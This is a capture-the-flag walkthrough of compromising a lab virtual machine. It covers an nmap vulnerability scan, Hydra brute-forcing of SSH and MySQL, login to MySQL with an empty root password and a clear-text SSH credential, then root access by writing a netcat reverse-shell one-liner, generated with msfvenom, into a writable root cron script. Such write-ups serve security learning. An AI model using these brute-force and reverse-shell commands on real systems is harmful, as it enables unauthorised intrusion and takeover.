1. Host discovery
Using netdiscover, the target's IP address was found to be 192.168.203.145.
2. Port scanning
Using Nmap:
root@kali:~# nmap -sS -A 192.168.203.145 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 08:49 CST
Nmap scan report for 192.168.203.145
Host is up (0.00051s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:7.4:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /info.php: Possible information file
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| vulners:
| cpe:/a:apache:http_server:2.4.6:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117
| CVE-2013-4352 4.3 https://vulners.com/cve/CVE-2013-4352
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
3306/tcp open mysql MySQL 5.5.60-MariaDB
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| MySQL 5.5.60-MariaDB:
|_ NODEJS:602 0.0 https://vulners.com/nodejs/NODEJS:602
MAC Address: 00:0C:29:79:43:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.51 ms 192.168.203.145
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.70 seconds
The target has ports 22 (SSH), 80 (HTTP) and 3306 (MySQL) open. Note that the vulners entries above are matched purely on the version banners (OpenSSH 7.4, Apache 2.4.6); CentOS backports security fixes without bumping the version number, so that list is a pointer to things worth checking, not a set of confirmed vulnerabilities.
3. Finding vulnerabilities
Nmap's http-enum script reported an info.php, so we first visit the web service.
It is just the default Apache test page.
Viewing info.php:
Next, scan for directories with dirb:
That turns up nothing new either, so what is left is brute-forcing SSH and MySQL.
The brute-force tool is Hydra:
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.203.145
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.203.145
The brute-force ran for a long time without success; in the end it turned out that the MySQL root account logs in with an empty password! A wordlist run only finds a blank password if the list contains an empty entry, so it is worth adding Hydra's -e n option (try the null password; -e nsr also tries the username itself and reversed) before starting any long wordlist run.
Log in directly with mysql -h 192.168.203.145 -u root -p and press Enter at the password prompt:
After some digging around, a database named ssh turned out to hold an SSH username and password, stored in clear text rather than hashed:
MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
4. Privilege escalation
Connect over SSH with ssh -p22 mistic@192.168.203.145.
Login succeeds!
Now we need root in order to read the flag under /root.
sudo -l shows that this user is not allowed to run anything via sudo:
Next, search for SUID programs with find / -type f -perm -u=s 2>/dev/null.
The crontab binary appears in the list. That is normal for crontab, but it is a reminder to look at scheduled tasks; perhaps they can be used for privilege escalation.
Check the system crontab: cat /etc/crontab
Sure enough, there is a script that runs as root, and the current user mistic can write to it!
Write the reverse shell into logrot.sh with:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.203.129 7777 >/tmp/f" > logrot.sh
Here 192.168.203.129 is the attacking Kali machine. The one-liner uses the FIFO /tmp/f as the shell's input channel: nc writes whatever arrives from the attacker into /tmp/f, cat feeds it to an interactive /bin/sh, and the shell's stdout and stderr are piped back into the same nc connection.
The difference between > and >>: the former overwrites the file's contents, the latter appends. Because > is used here, whatever logrot.sh originally did for the cron job is replaced by the payload; appending with >> would keep the original behaviour and be less conspicuous. When I did DC-7 earlier I had no idea how this command was produced; now I know it comes from msf, as follows:
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.203.129 LPORT=7777 R
Back to the task: after writing the command, start a listener with nc -lvp 7777, wait for the cron job to fire, and we have a root shell.
The flag is read successfully.